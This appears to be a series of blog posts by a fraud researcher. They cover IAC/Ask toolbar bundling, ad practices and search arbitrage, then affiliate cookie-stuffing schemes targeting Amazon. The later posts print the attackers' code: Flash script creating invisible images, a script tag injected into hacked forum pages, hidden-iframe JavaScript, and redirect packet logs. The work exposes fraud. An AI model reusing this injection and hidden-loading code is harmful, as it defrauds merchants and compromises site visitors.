IAC Toolbars and Traffic Arbitrage in 2013

Beginning in 2005, I flagged serious problems with IAC/Ask.com toolbars — including installations through security exploits and through bundles that nowhere sought user consent, installations targeting kids, rearranging users’ browsers to invite unintended searches, and showing a veritable onslaught of ads. IAC’s practices have changed in various respects, but the core remains as I previously described it: IAC’s search advertising business exists not to solve a genuine user need or provide users with genuine assistance, but to prey on users who — through inattention, inexperience, youth, or naivete — stumble into IAC’s properties.

Crucially, IAC remains substantially dependent on Google for monetization of IAC’s search services. A rigorous application of Google’s existing rules would put a stop to many of IAC’s practices, and sensible updated rules — following the stated objective of Google’s existing policies — would end much of the rest.

In this piece I examine current IAC toolbar installation practices (including targeting kids and soliciting installations when users are attempting to install security updates), the effects of IAC toolbars once installed (including excessive advertising and incomplete uninstall), and IAC’s search arbitrage business. I conclude by flagging advertisements with impermissibly large clickable areas (for both toolbars and search arbitrage), and I call on Google to put an end to Ask’s practices.

IAC Toolbar Installation

IAC’s search toolbar business is grounded in placing IAC toolbars on as many computers as possible. To that end, IAC offers 50+ different toolbars with a variety of branding — Webfetti (“free Facebook graphics”), Guffins (“virtual pet games”), religious toolbars of multiple forms (Know the Bible, Daily Bible Guide, Daily Jewish Guide), screensavers, games, and more. One might reasonably ask: Why would a user want such a toolbar?

IAC ad promises 'free online television' but actually merely links to material already on the web; promises an 'app' but actually provides a search toolbar. IAC ad promises “free online television” but actually merely links to material already on the web; promises an “app” but actually provides a search toolbar.

IAC ad solicits installations via 'virtual pet' ad distinctively catering to kids.IAC ad solicits installations via “virtual pet” ad distinctively catering to kids.

Other IAC Guffins ads specifically invite 'kids' to install. (Screenshot by iSpionage) Other IAC Guffins ads specifically invite “kids” to install. (Screenshot by iSpionage)

IAC Guffins offer features multiple animated cartoon images, distinctively catering to kids.

The Television Fanatic toolbar is instructive. IAC promotes this toolbar with search ads that promise “free online television” and “turn your computer into a TV watch full TV episode w free app.” It sounds like an attractive deal — many users would relish the ability to watch free live broadcast television on an ordinary computer, and it would not be surprising if such a service required downloading some sort of desktop application or browser plug-in. But in fact Television Fanatic offers nothing of the sort. To the extent that Television Fanatic offers the “free online television” promised in the ad, it only links to ordinary video content already provided by others. (For example, I clicked the toolbar’s “ABC” link and was taken to http://abc.go.com/watch/ — an ordinary ABC link equally available to users without Television Fanatic. That’s a far cry from IAC’s promise of special access to premium material.

Meanwhile, IAC’s Guffins toolbar distinctively targets kids. IAC promotes Guffins via search ads for terms like “virtual pet”, and the resulting ad says Guffins offers “puppy, cats, bunny, dragons & more” which a user can “feed, play, [and] care for.” The landing page features four animated animals with oversized faces and overstated features, distinctively attractive to children. Under COPPA factors or any intuitive analysis, IAC clearly targets kids. Indeed, ad tracking service iSpionage reports Guffins ads touting “Free Kids Games Download”, “Free Kids Computer Games”, “Play Kids Games Online”, and more — explicitly inviting children to install Guffins. Of course kids are ill-equipped to evaluate IAC’s offer — less likely to notice IAC’s disclosures of an included toolbar, less likely to understand what a search toolbar even is, and less able to evaluate the wisdom of installing such a toolbar in exchange for games.

While IAC’s ads often promise an “app” (including as shown in the ad screenshots at right), IAC actually offers just toolbars — add-ins appearing within web browsers, not the freestanding applications that the ads suggest. That’s all the more deceptive: IAC enticed users with the promise of genuine distinct programs offering exceptional video content and rich gaming. Instead IAC provided browser plug-ins that claim valuable screen space whenever users browse the web. And far from providing exclusive content, IAC toolbars send users to material already on the web and driving traffic to IAC’s advertising displays (as detailed in the next section). That’s strikingly inferior.

IAC’s toolbar installation practices stack up unfavorably vis-a-vis applicable Google policies, industry standards, and regulatory requirements. Google’s Software Principles call for “Upfront disclosure” with no suggestion that an app may promise one thing in an initial solicitation, then something else in a subsequent landing page. (IAC is obliged to comply with Google’s rules because IAC toolbars show ads from Google, as discussed in the next section.) Meanwhile, the Anti-Spyware Coalition specifically flags installations targeting children, allowing bundling by affiliates, and modifying browser settings as risk factors making software a greater concern. Even decades-old FTC rules are on point, disallowing “deceptive door openers” that promise one thing at the outset (like IAC’s initial promise of “free online television”) but later deliver something importantly different (a search toolbar).

Web searches reveal numerous user complaints about IAC toolbars. Consider search results for “televisionfanatic”. A first result links to product’s official site. Second is a Sitejabber forum with 20 harsh reviews. (17 reviewers gave Television Fanatic just one star out of five, with comments systematically reporting surprise and annoyance at the toolbar’s presence.) The third result advises “How to uninstall a Television fanatic toolbar”, and the fourth is multiple Yahoo Answers discussions including a user asking “Is television fanatic toolbar a virus?” and others repeatedly complaining about unintended installation. Clearly numerous users are dissatisfied with Television Fanatic.

So too for DailyBibleGuide. In a Q1 2011 earnings call, IAC CEO Greg Blatt touted the DailyBibleGuide toolbar as a new product IAC is particularly proud of. But a Google search results for “DailyBibleGuide” include a page advising “do not download Dailybiblestudy, Dailybibleguide, or Knowthebible extension.” There and elsewhere, users seem surprised to receive IAC’s toolbars. Reading users’ complaints, it seems their confusion ultimately results from IAC’s decision to deliver bible trivia via a toolbar. After all, such material would more naturally be delivered via a web page, email newsletter, or perhaps RSS feed. IAC chose the odd strategy of toolbar-based delivery not because it was genuinely what users wanted, but because this is the format IAC can best monetize. No wonder users systematically end up disappointed.

By all indications, a huge number of users are running IAC toolbars. The IAC toolbars discussed in this section all send users to mywebsearch.com, a site users are unlikely to visit except if sent there by an IAC toolbar. Alexa reports that mywebsearch.com is the #41 most popular site in the US and #71 worldwide — more popular than Instagram, Flickr, Pandora, and Hulu.

Some of IAC’s browser configuration changes remain in place even if a user removes an IAC toolbar. I installed then uninstalled an IAC Television Fanatic toolbar and received a prompt instructing “Click here for help on resetting your home page and default search settings.” The resulting page specified four different procedures totaling 16 steps — far more lengthy than the initial installation. I can see no proper reason why uninstall is so difficult. Indeed, IAC’s incomplete uninstall specifically violates Google’s October 2012 requirement that “During the uninstall process, users must be presented with a choice that gives them the option of returning their browser’s user settings to the previous settings.” Google’s Software Principles are also on point, instructing that uninstall must be “easy” and must disable “all functions of the application” — whereas IAC’s automated installer does not undo all of IAC’s changes, and IAC’s manual 16-step process is the opposite of “easy.”

The Special Problems of IAC Ask Toolbar Installed by Oracle’s Java Updates

Oracle Java security updates install Ask Toolbar by default, with just a single click in a multi-step installer. Java security update installs Ask Toolbar by default — a single click in a multi-step installer.

Ongoing Oracle Java updates also install the IAC Ask Toolbar. I discuss these installations in this separate section because they raise concerns somewhat different from the IAC toolbars discussed above. I see five key problems with Oracle Java updates that install IAC toolbars:

First, as Ed Bott noted last week, the “Install the Ask Toolbar” checkbox is prechecked, so users can install the Ask toolbar with a single click on the “Next” button. Accidental installations are particularly likely because the Ask installation prompt is step three of five-screen installation process. When installing myriad software updates, it’s easy to get into a routine of repeatedly clicking Next to finish the process as quickly as possible. But in this case, just clicking Next yields the installation of Ask’s toolbar.

Second, although the Ask installation prompt does not show a “focus” (a highlighted button designated as the default if a user presses enter), the Next button actually has focus. In testing, I found that pressing the enter or spacebar keys has the same effect as clicking “Next.” Thus, a single press of either of the two largest keys on the keyboard, with nothing more, is interpreted as consent to install Ask. That’s much too low a bar — far from the affirmative indication of consent that Google rules and FTC caselaw call for.

Third, in a piece posted today, Ed Bott finds Oracle and IAC intentionally delaying the installation of the Ask Toolbar by fully ten minutes. This delay undermines accountability, especially for sophisticated users. Consider a user who mistakenly clicks Next (or presses enter or spacebar) to install Ask Toolbar, but immediately realizes the mistake and seeks to clean his computer. The natural strategy is to visit Control Panel – Programs and Features to activate the Ask uninstaller. But a user who immediately checks that location will find no listing for the Ask Toolbar: The uninstaller does not appear until the Ask install finishes after the intentional ten minute delay. Of course even sophisticated users have no reason or ability to know about this delay. Instead, a sophisticated user would conclude that he somehow did not install Ask Toolbar after all — and only later will the user notice and, perhaps, proceed with uninstall. Half a decade ago I found WhenU adware engaged in similar intentional delay. Similarly, NYAG litigation documents revealed notorious spyware vendor Direct Revenue intentionally declining to show ads in the first day after its installation. (Direct Revenue staff said this delay would “reduce the correlation between the Morpheus download [which bundled Direct Revenue spyware] and why they are seeing [Direct Revenue’s popup] ads” — confusion that DR staff hoped would “creat[e] less of a path to what they [users] should uninstall.”) Against this backdrop, it’s particularly surprising to see IAC and Oracle adopt this tactic.

Fourth, IAC makes changes beyond the scope of user consent and fails to revert these changes during uninstall. The Oracle/IAC installation solicitation seeks permission to install an add-on for IE, Chrome, and Firefox, but nowhere mentions changing address bar search or the default Chrome search provider. Yet the installer in fact makes all these changes, without ever seeking or receiving user consent. Conversely, uninstall inexplicably fails to restore these settings. As noted above, these incomplete uninstalls violate Google’s Software Principles requirement that an “easy” uninstall must disable “all functions of the application.”

Finally, the Java update is only needed as a result of a serious security flaw in Java. It is troubling to see Oracle profit from this security flaw by using a security update as an opportunity to push users to install extra advertising software. Java’s many security problems make bundled installs all the worse: I’ve received a new Ask installation prompts with each of Java’s many security updates. (Ed Bott counts 11 over the last 18 months.) Even if the user had declined IAC’s offer on half a dozen prior requests, Oracle persists on asking — and a single slip-up, just one click or keystroke on the tenth request, will nonetheless deliver Ask’s toolbar.

A security update should never serve as an opportunity to push additional software. As Oracle knows all too well from its recent security problems, users urgently need software updates to fix serious vulnerabilities. By bundling advertising software with security updates, Oracle teaches users to distrust security updates, deterring users from installing updates from both Oracle and others. Meanwhile, by making the update process slower and more intrusive, Oracle reduces the likelihood that users will successfully patch their computers. Instead, Oracle should make the update process as quick and easy as possible — eliminating unnecessary steps and showing users that security updates are quick and trouble-free.

Toolbar Operations and Result Format

Once a user receives an IAC toolbar, a top-of-browser stripe appears in Internet Explorer and Firefox, and IAC also takes over default search, address bar search, and error handling. That’s an intrusive set of changes, and particularly undesirable in light of the poor quality of IAC’s search results.

If a user runs a search through an IAC toolbar or through a browser search function modified by IAC, the user receives Mywebsearch or Ask.com results page with advertisements and search results syndicated from Google. The volume of advertisements is remarkable: On a 800×600 monitor, the entire first two screens of Mywebsearch results presented advertisements (screen one, screen two) — four large ads with a total of seven additional miniature ads contained within. The first algorithmic search result appears on the third on-screen page, where users are far less likely to see it. At Ask.com, ads are even larger: fully seven advertisements appear above the first algorithmic result, and three more ads appear at page bottom — more than filling two 800×600 screens.

IAC obtains these advertisements and search results from Google, but IAC omits features Google proudly touts in other contexts. For example, Google claims that its maps, hotel reviews, and hotel price quotes benefit users and save users time — but inexplicably IAC Mywebsearch lacks these features, even though these features appear prominently and automatically for users who run the same search at Google. In short, a user viewing IAC results gets listings that are intentionally less useful — designed to serve IAC’s business interest in encouraging the user to click extra advertisements, with much less focus on providing the information that IAC and Google consider most useful.

The ad format at IAC Mywebsearch and Ask.com makes it particularly likely that users will mistake IAC ads for algorithmic results. For one, IAC omits any distinctive background color to help users distinguish ads from algorithmic results. Furthermore, IAC’s voluminous ads exceed beyond the first screen of results for many searches. A user familiar with Google would expect ads to have a distinctive background color and would know that ads typically rarely completely fill a screen — so seeing no such background color and similar-format results continuing for two full screens, the user might well conclude that these are algorithmic listings rather than paid advertisements.

Traffic Arbitrage

IAC buys traffic from Google and other search engines. The resulting sequence is needlessly convoluted: A user runs a search at Google, clicks an IAC ad purporting to offer what the user requested], then receives an IAC landing page with the very same ads just seen at Google. For example, I searched for [800 number look up] at Google and clicked an Ask ad. The resulting Ask page allocated most of its the above-the-fold space to three of the same ads I had just seen at Google! This process provides zero value to the user — indeed, negative value, in that the extra click adds time and confusion. But IAC monetizes its site unusually aggressively — for example, regularly putting four ads at the top of the page, where Google sometimes puts none and never presents more than three. Of course these extra ads serve IAC’s interest: By pushing a fraction of users to click multiple ads, IAC can more than cover its costs of buying the traffic from Google in the first place.

Longstanding Google rules exactly prohibit IAC’s search arbitrage. Google’s AdWords Policy Center instructs that “Google AdWords doesn’t allow the promotion of websites that are designed for the sole or primary purpose of showing ads.” Google continues: “One example of this kind of prohibited behavior is called arbitrage, where advertisers drive traffic to their websites at low cost and pay for that traffic by earning money from the ads placed on those websites”

Why isn’t Google enforcing its rules against arbitrage? An October 2012 Search Engine Land article quotes a reader who wrote to Google AdWords support, where a representative replied with unusual candor: “Since Ask.com is considered a Google product, they are able to serve ads at the top of the page when the search query is found to be relevant to their ads.” Of course Ask.com is not actually “a Google product” — it’s a Google syndicator, showing Google ads in exchange for a revenue share, just like thousands of other sites. But with IAC reportedly Google’s biggest advertising customer, special privileges would be less than surprising. Meanwhile, Google lets IAC do Google’s dirty work — showing extra ads to gullible users — which could let Google collect additional ad revenue from those users’ clicks. Still, that’s no help to users (who get pulled into extra page-views and less useful pages with more advertisements) or advertisers (whose costs increase as a result). And once the public recognizes Google’s role in authorizing this scheme, selling all advertising, and funding the entirety of IAC’s activity, Google ends up looking at least as culpable as IAC.

Ads with Oversized Clickable Areas

IAC ad promises 'free online television' but actually merely links to material already on the web; promises an 'app' but actually provides a search toolbar. Contrary to standard industry practice and Google rules, IAC makes the entire ad — including domain name, ad text, and large whitespace — into a clickable link. Notice the large clickable area flagged in the red box.

IAC ad promises 'free online television' but actually merely links to material already on the web; promises an 'app' but actually provides a search toolbar. At Google, only the ad itself is clickable. Not the much smaller red box.

IAC’s ads also flout industry practice and Google rules as to the size of an ad’s clickable area. Both in arbitrage landing pages and in toolbar results, IAC’s search result pages expand the clickable area of each advertisement to fill the entire page width, sharply increasing the fraction of the page where a click will be interpreted as a request to visit the advertiser’s page.

See the screenshot at right. (To create the red-outlined box showing the shape of the clickable area, I clicked an empty section of the ad and began a brief drag, causing my browser to highlight the ad’s clickable area in red as shown in the screenshot.)

Ask is an outlier in converting whitespace around an ad into a clickable area. Every other link on Ask.com landing pages — every link other than an advertisement — follows standard industry practice with only the words of the link being clickable, but not the surrounding whitespace. Indeed, at Google, Bing, and Yahoo, white space is never clickable. At Google and Bing, only ad titles are clickable, not ad domain names, or ad text. (See Google screenshot at right, showing the limited clickable area of a Google ad.) At Yahoo, only ad titles and domain names are clickable, not ad text or white space.

IAC has taken intentional action to expand its ads’ clickable area to cover all available width. As W3schools explains, “A block element is an element that takes up the full width available.” To expand ad hyperlinks to fill the entire width, Ask tags each ad hyperlink with the CSS STYLE of display:block.

<a id=”lindp” class=”ptbs pl20 pr30 ptsp pxl” style=”display:block;padding-bottom: 0px;” …

Google’s rules prohibit IAC’s expanded clickable areas. Google requires that “clicking on space surrounding an ad should not click the ad.” Yet IAC nonetheless makes a clickable area out of the area surrounding each ad, extending all the way to the right column.

IAC’s expanded ads invite accidental clicks. Accidental clicks are particularly likely from the inexperienced users IAC systematically targets for toolbar installations, and also from users searching on tablets, phones, and other touch devices. These extra clicks waste users’ time and drive up advertisers’ costs — but every such click yields extra revenue for IAC and Google.

What Comes Next

Google should enforce its rules strictly. No doubt IAC can offer Google some short-term revenue via extra ad-clicks from unsophisticated or confused users. But this isn’t the kind of business Google aspires to, and Google’s public statements indicate no interest in such bottom-feeding. Indeed, a fair application of Google’s existing AdWords rules would disallow both IAC’s toolbar ads (using AdWords to solicit installations) and IAC’s search arbitrage ads (using AdWords to send users to IAC pages presenting syndicated AdWords ads). Meanwhile, numerous Google AdSense rules are also on point, including prohibiting encouraging accidental clicks, prohibiting site layout that pushes content below the fold, and limiting the number of ads per page. So too for Software Principles requiring up-front disclosure as well as “easy” and complete uninstall.

As a publicly-traded company, IAC should benefit from the oversight and guidance of its outside directors. But the New York Times commented in 2011 that “IAC’s board is filled with high-powered friends of Mr. Diller,” calling into question the independence and effectiveness of IAC’s outside directors. Of particular note is Chelsea Clinton, who joined IAC’s board in September 2011. Ms. Clinton’s prior experience includes little obvious connection to Internet advertising or online business, suggesting that she might need to invest extra time to learn the details of IAC’s business. Yet she also has weighty commitments including ongoing doctoral studies, serving as an Assistant Vice Provost at NYU, and reporting as a special correspondent for the NBC Nightly News — calling into question the time she can devote to IAC matters. The Times questioned why IAC had brought in Ms. Clinton, concluding that “This is clearly an appointment made because of who she is, not what she has done.” Indeed, Ms. Clinton’s background means she will be held to a particularly high standard: if she fails to stop IAC’s bad practices, the public may reasonably ask whether she has done her duty as an outside director.

Recent research from Goldman analyst Heath Terry flags investor concerns at IAC’s tactics. In a December 4, 2012 report, Terry downgraded IAC to sell due to vulnerability from Google policy changes. A January 9, 2013 follow-up noted IAC changing its uninstall practices to comply with Google policy as well as slowdown in arbitrage. Terry flags some important factors, and I share his bottom line that IAC’s search practices are unsustainable. But the real shoe has yet to drop. If Google is embarrassed at IAC’s actions — and it should be — Google is easily able to put an end to this mess.

I prepared a portion of this article at the request of a client that prefers not to be listed by name. The client kindly agreed to let me include that research in this publicly-available posting.

Affiliate Fraud Litigation Index

Some analysts view affiliate marketing as “fraud-proof” because affiliates are only paid a commission when a sale occurs. But affiliate marketing nonetheless gives rise to various disputes — typically, merchants alleging that affiliates claimed commission they had not properly earned. Most such disputes are resolved informally: merchants withhold amounts affiliates have purportedly earned but have not yet received. Occasionally, disputes end up in litigation with public availability of the details of alleged perpetrators, victims, amounts, and methods.

In today’s posting, I present known litigation in this area including case summaries and primary source documents:

Affiliate Fraud Litigation Index

Flash-Based Cookie-Stuffer Using Google AdSense to Claim Unearned Affiliate Commissions from Amazon with Wesley Brandi

Merchants face special challenges when operating large affiliate marketing programs: rogue affiliates can claim to refer users who would have purchased from those merchants anyway. In particular, rogue “cookie-stuffer” affiliates deposit cookies invisibly and unrequested — knowing that a portion of users will make purchases from large merchants in the subsequent days and weeks. This tactic is particularly effective in defrauding large merchants: the more popular a merchant becomes, the more users will happen to buy from that merchant within a given referral period.

To cookie-stuff at scale, an attacker needs a reliable and significant source of user traffic. In February we showed a rogue affiliate hacking forum sites to drop cookies when users merely browse forums. But that’s just one of many strategies. I previously found various cookie-stuffing on sites hoping to receive search traffic. In a 2009 complaint, eBay alleges that rogue affiliates used a banner ad network to deposit eBay affiliate cookies when users merely browsed web pages showing certain banner ads. See also my 2008 report of an affiliate using Yahoo’s Right Media ad network to deposit multiple affiliate cookies invisibly — defrauding security vendors McAfee and Symantec.

As the eBay litigation indicates, display advertising networks can be a mechanism for cookie-stuffing. Of course diligent ad networks inspect ads and refuse cookie-stuffers (among other forms of malvertising). So we were particularly surprised to see Google AdSense running ads that cookie-stuff Amazon.

The 'Review Different Headphones' ad actually drops Amazon Associates affiliate cookies.
This innocuous-looking banner ad sets Amazon Associates cookies invisibly.
The Imgwithsmiles attack

We have uncovered scores of web sites running the banner ad shown at right. On 40 sites, on various days from February 6 to May 2, our crawlers found this banner ad dropping Amazon Associates affiliate cookies automatically and invisibly. All 40 sites include display advertising from Google AdSense. Google returns a Flash ad from Imgwithsmiles. To an ordinary user, the ad looks completely innocuous — the unremarkable “review different headphones” image shown at right. However, the ad actually creates an invisible IMG (image) tag loading an Amazon Associates link and setting cookies accordingly. Here’s how:

First, the ad’s Flash code creates an invisible IMG tag (10×10 pixels) (yellow highlighting below) loading the URL http://imgwithsmiles.com/img/f/e.jpg (green).

function Stuff() {
  if (z < links.length) {
    txt.htmltext = links[z];
    z++;
    return(undefined);
  }
  clearinterval(timer);
}
links = new array();
links[0] = "<img src="http://imgwithsmiles.com/img/f/e.jpg" width="10" height="10"/>";z = 0;timer = setinterval(Stuff, 2000);

While /img/f/e.jpg features a .jpg extension consistent with a genuine image file, it is actually a redirect to an Amazon Associates link. See the three redirects preserved below (blue), including a tricky HTTPS redirect (orange) that would block many detection systems. Nonetheless, traffic ultimately ends up at Amazon with an Associates tag (red) specifying that affiliate charslibr-20 is to be paid for these referrals.

GET /img/f/e.jpg HTTP/1.0
Accept: */*
Accept-Language: en-US
Referer: http://pagead2.googlesyndication.com/pagead/imgad?id=CICAgICQvuXgahDQAhiYAjII3bQHU19r_Isx-flash-version: 10,3,183,7User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; ...)Host: imgwithsmiles.comConnection: Keep-AliveHTTP/1.1 302 Moved TemporarilyDate: Wed, 02 May 2012 19:56:59 GMTServer: Apache/2.2.21 (Unix) mod_ssl/2.2.21 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.17
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=174272468a212dd0862eabf8d956e4e0; path=/
Location: https://imgwithsmiles.com/img/kick/f/e.jpg
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html-

HTTPS redirect decoded via separate manual request
GET /img/kick/f/e.jpg HTTP/1.1 Accept: text/html, application/xhtml+xml, */* Accept-Language: en-US User-Agent: ... Accept-Encoding: gzip, deflate Host: imgwithsmiles.com Connection: Keep-AliveHTTP/1.1 302 Moved Temporarily Date: ... Server: Apache/2.2.21 (Unix) mod_ssl/2.2.21 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.17 Location: http://imgwithsmiles.com/img/t/f/e.jpg Content-Length: 0 Connection: close Content-Type: text/html-GET /img/t/f/e.jpg HTTP/1.0 Accept: */* Accept-Language: en-US x-flash-version: 10,3,183,7 User-Agent: Mozilla/4.0 (compatible; ...) Connection: Keep-Alive Host: imgwithsmiles.com Cookie: PHPSESSID=174272468a212dd0862eabf8d956e4e0HTTP/1.1 302 Moved TemporarilyDate: Wed, 02 May 2012 19:56:59 GMT Server: Apache/2.2.21 (Unix) mod_ssl/2.2.21 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.17 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Location: http://www.amazon.com/gp/product/B002L3RREQ?ie=UTF8&tag=charslibr-20 Content-Length: 0 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html

If a user happens to make a purchase from Amazon within the subsequent 24 hours, Amazon will pay a commission to this affiliate — even though the affiliate did nothing at all to cause or encourage the user to make that purchase.

Does Amazon know?

The available information does not reveal whether or not Amazon knew about this affiliate’s practices. Nor can we easily determine whether, as of the May 2, 2012 observations presented above, this affiliate was still in good standing and receiving payment for the traffic it sent to Amazon.

On one hand, Amazon is diligent and technically sophisticated. Because Amazon runs one of the web’s largest affiliate programs, Amazon is necessarily familiar with affiliate fraud. And Amazon has ample incentive to catch affiliate fraud: Every dollar paid to fraudulent affiliates is money completely wasted, coming straight from the bottom line.

On the other hand, we have observed this same affiliate cheating Amazon for three months nonstop. All told, we’ve seen this affiliate rotating through 49 different Associates IDs. If Amazon had caught the affiliate, we would have expected the affiliate to shift away from any disabled affiliate accounts, most likely by shifting traffic to new accounts. Of the 28 Associates IDs we observed during February 2012, we still saw 6 in use during May 2012 (month-to-date) — suggesting that while Amazon may be catching some of the affiliate’s traffic, Amazon probably is not catching it all.

A further indication of the affiliate’s earnings comes from the affiliate’s willingness to incur out-of-pocket costs to buy media (AdSense placements from Google) with which to deliver Amazon cookies. As best we can tell, Amazon is the affiliate’s sole source of revenue. Meanwhile, the affiliate must pay Google for the display ad inventory the affiliate receives. These direct incremental costs give the affiliate a clear incentive to cease operation if it concludes that payment from Amazon will not be forthcoming. From the affiliate’s ongoing actions we can infer that the affiliate finds this scheme profitable — that its earnings to date have exceeded its expenses to date.

How profitable is this affiliate’s attack? Conservatively, suppose 40% of users are Amazon shoppers and make an average of four purchases from Amazon per year. Then 0.4*4/365=0.44% of users are likely to make purchases from Amazon in any given 24-hour period. Suppose the affiliate buys 1,000,000 CPM impressions from Google. Then the affiliate will enjoy commission on 0.44%*1,000,000=4,384 purchases. At an average purchase size of $30 and a 6.5% commission, this would be $8,547 of revenue per million cookie-stuffing incidents. How much would the affiliate have to pay Google for 1,000,000 CPM impressions? We’ve seen this affiliate on a variety of sites, but largely sites in moderate to low-priced verticals. At $2 CPM, the affiliate’s costs would be $2,000 — meaning the affiliate would still be slightly profitable even if Amazon caught 3/4 of its affiliate IDs before the first payment!

We alerted our contact at Amazon Associates to our observations. We will update this post with any information Amazon provides.

Search My Logs of Affiliate Fraud

Since 2004, I’ve been tracking and reporting all manner of rogue affiliatesusing spyware and adware to cover competitors’ sites; using trickier spyware and adware to claim commission on merchants’ organic traffic; typosquatting; stuffing cookies through invisible IFRAME’s and IMG’s, banner ads, and even hacked forum sites; and the list goes on. I now have automation catching these practices in ever-increasing quantities.

While I’ve written up dozens of rogue affiliates on this site and in various presentations, today Wesley Brandi and I are introducing something better: query-based access to our records of affiliate fraud targeting top affiliate merchants. Enter a merchant’s domain name, and we’ll tell you how much affiliate fraud we’ve seen targeting that domain — handy for merchants wanting to check whether their program is clean, and for affiliates wanting to confirm the trustworthiness a program they’re considering promoting. We’re not currently posting details of the specific perpetrators, but we have affiliate ID numbers, domain names, and packet log proof on file for each violator, and we can provide these upon request.

Take a look:

Affiliate Fraud Information Lookup
(2015 update: service no longer operational)

Hack-Based Cookie-Stuffing by Bannertracker-Script with Wesley Brandi

Last month we presented an example cookie-stuffer using encoded JavaScript to drop scores of cookies invisibly. But how can such a cookie-stuffer get traffic to its site? Today’s example is particularly nefarious: Perpetrators using server bannertracker-script.com have hacked at least 29 different online discussion forums to add invisible code that lets them cookie-stuff forum visitors. Through this approach, perpetrators have gained access to a particularly large amount of traffic — letting them target all the more users.

Getting Traffic to Bannertracker-script

The perpetrators appear to be targeting a documented exploit in vBulletin (a popular forum discussion program built in PHP/MySQL) versions v4.x to v4.1.2. The exploit allows for a remote attacker to execute arbitrary PHP script as well as untrusted SQL queries. It was first reported in German in April 2011, then in English in January 2012. A video tutorial even offers step-by-step instructions on how to use this exploit.

Our automation systems have examined more than 500,000 sites, searching for code promoting the cookie-stuffers we are following. We have found numerous affected sites, including sites as popular as searchenginewatch.com (Alexa traffic rank #2045), webdeveloper.com (#2822) and redflagdeals.com (#3188) along with many more. Selected pages of these sites (typically the forum pages) embed hostile code from Bannertracker-script.

In each instance, the hostile code appears as a brief JavaScript addition to an otherwise-legitimate site. See the single line of inserted code highlighted in yellow below. Notably, the hostile code appears within a block of code embedding comScore tags (green highlighting below) — a place where site designers expect to see external JavaScript references, making the Bannertracker-script insertion that much less likely to be detected.

<!– Begin comScore Tag –>
<script type=”text/javascript” src=”http://www.bannertracker-script.com/banner/ads.php?a=big”></script>
<script type=”text/javascript”>document.write(“<img id=’img1′ height=’1′ width=’1′>”);
document.getElementById(“img1”).src=”http://beacon.scorecardresearch.com/scripts/beacon.dll? C1=2&C2=5915554&C3=5915554&C4=www.redflagdeals.com &C5=&C6=&C7=” + escape(window.location.href) + “&C8=” + escape(document.title) + “&C9=” + escape(document.referrer) + “&rn=” + Math.floor(Math.random()*99999999);</script><!– End comScore Tag –>

Examining Bannertracker-script insertions on other sites, we found them in other inconspicuous places — for example, just before the </HTML> tag that ends a page.

Cookie-Stuffing by Bannertracker-script

As a result of the hack-based code insertion shown above, a user visiting any affected site receives Bannertracker-script code also. That code creates an invisible IFRAME which loads the Amazon site via an affiliate link. Here’s how: First, the code creates a doubly-invisible DIV (CSS style of display:hidden and visibility:none, shown in blue highlighting below). The code then creates an invisible IFRAME within that DIV (CSS display:none, visibility:hidden, size of 0x0 pixels, shown in purple highlighting below). The code instructs that the DIV load a URL on Http-uptime.com (grey) which redirects through to an Amazon Associates affiliate link with affiliate ID camerlucidpho-20 (red). See also the full packet log.

GET /banner/ads.php?a=big HTTP/1.1 …
Referer: http://forums.redflagdeals.com/ …
Host: www.bannertracker-script.com

HTTP/1.1 200 OK …
GPad = {
init: function () {
document.write(‘<div id=”GPAD” style=”visibility:hidden; display:none;”></div>’);
var frame = document.createElement(‘iframe’);
frame.setAttribute(‘src’, ‘http://www.http-uptime.com/banner/index.php‘);
frame.setAttribute(‘style’, ‘display:none; width: 0px; height 0px; border: none; visibility:hidden‘);
frame.style.visibility = ‘hidden’;
frame.style.display = ‘none’;
var div = document.getElementById(‘GPAD’);
div.appendChild(frame);
}
}
GPad.init();

GET /index.php HTTP/1.1 …
Referer: http://forums.redflagdeals.com/ …
Host: www.http-uptime.com

HTTP/1.1 200 OK …
<html><head><meta http-equiv=”refresh” content=”0;url=http://www.http-uptime.com/icons/blank.php?url=http%3A%2F%2Fwww.amazon.com%2Fgp%2Fsearch%3Fie%3DUTF8%26keywords%3D%26tag%3Dcamerlucidpho-20%26index%3Dpc-hardware%26linkCode%3Dur2%26camp%3D1789%26creative%3D932″ />
</head></html>

GET /icons/blank.php?url=http%3A%2F%2Fwww.amazon.com%2Fgp%2Fsearch%3Fie%3DUTF8%26keywords%3D%26tag%3Dcamerlucidpho-20%26index%3Dpc-hardware%26linkCode%3Dur2%26camp%3D1789%26creative%3D932 HTTP/1.1 …
Host: www.http-uptime.com

HTTP/1.1 302 Moved Temporarily …
Location: http://www.amazon.com/gp/search?ie=UTF8&keywords=&tag=camerlucidpho-20&index=pc-hardware&linkCode=ur2&camp=1789&creative=932

The net effect is to load Amazon’s site invisibly. Amazon operates using a 24-hour referral period, so if a user happened to make a purchase from Amazon within the next 24 hours, Amazon would credit this affiliate as the putative referer of the traffic — paying this affiliate a commission of at least 4% and as much as 15%.

Concealment by Bannertracker-script

The preceding discussion noted two mechanisms by which Bannertracker-script attempted to conceal its actions. First, it placed its tags within the comScore section of affected sites, where unfamiliar code is less likely to attract suspicion. Second, it loaded its tags invisibly, including via the multiple nested invisible elements detailed above. Still, by sending so much to Amazon, Bannertracker-script clearly recognized that it risked attracting scrutiny from Amazon, which might question how one affiliate obtained so much traffic. Bannertracker-script therefore turned to multiple Amazon Associates ID’s. In our testing, we found more than 200 such IDs of which we report 20 below:

abacemedi-20 aledesoftw-20 anybr-20 arizonosteopc-20  
actkid-20 allesbluefree-20 apa0c5-20 artofdri-20
adirooutdocom-20    alsjopa-20 apitherapy03-20   astba-20
afrkilbeemov-20 amergumbmachc-20    apitroservic-20 atlcitgam-20
ajelcand-20 ancestorville-20 arasmazi-20 babblu-20

